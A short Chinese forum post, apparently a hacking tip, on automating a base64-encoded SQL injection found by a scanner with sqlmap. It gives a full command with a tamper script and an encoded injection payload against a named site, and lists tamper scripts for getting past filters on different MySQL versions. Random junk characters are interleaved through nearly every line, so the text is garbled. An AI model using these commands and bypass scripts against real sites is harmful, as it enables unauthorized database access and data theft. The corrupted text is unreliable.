WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
6 P8 X4 _1 Z7 A* Q G3 ?
6 _; e+ |5 |( o& C; P4 Z: \sqlmap的tamper里有个base64encode.py
6 v& O: ^3 s1 f0 M# G3 p8 M( [3 e9 ?1 I0 b8 j/ m! j% z
使用如下
- ]. ^& P4 `: N
) S- W/ |4 a# `; h5 n4 dsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs9 c4 u8 i8 f3 G7 e
1 z0 l, d& L' Q1 E) v, t
/ H7 A7 u6 O2 \; o' {, \2 U6 ysqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”7 ]' P% {4 O+ g- q
, v' ~* [+ m' R其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
9 J3 e7 R A+ C( j ~
* W1 }/ J/ x$ j8 pspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入, L: J& {. H! V% ?4 d) K
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
$ T0 M7 r L. L# ?首先确定目标数据库版本,然后选择相应的脚本。! e, `$ S9 N, t# c* ~) R
-v 3 --batch --tamper "space2hash.py"" d6 K0 {: u( i# o! ^) q6 ^
0 A8 f9 _9 a5 S9 G还有其他一些插件:$ v' _ N5 y% E. c6 \" ~
encodes编码 ——charencode.py
/ H9 X& P" x. b6 Tbase64编码 —— base64encode.py
?: ^" c4 N, m8 u4 n替换空格和关键字 —— halfversionedmorekeywords.py
$ t6 g( P! {1 }) k a, N$ O |
3 ] c; R8 Q4 s' J: ~+ e0 d
4 D* U8 t+ B6 h# |" g# g C: ~" x% m5 d( U
9 l8 ~& u0 N3 g. w2 E |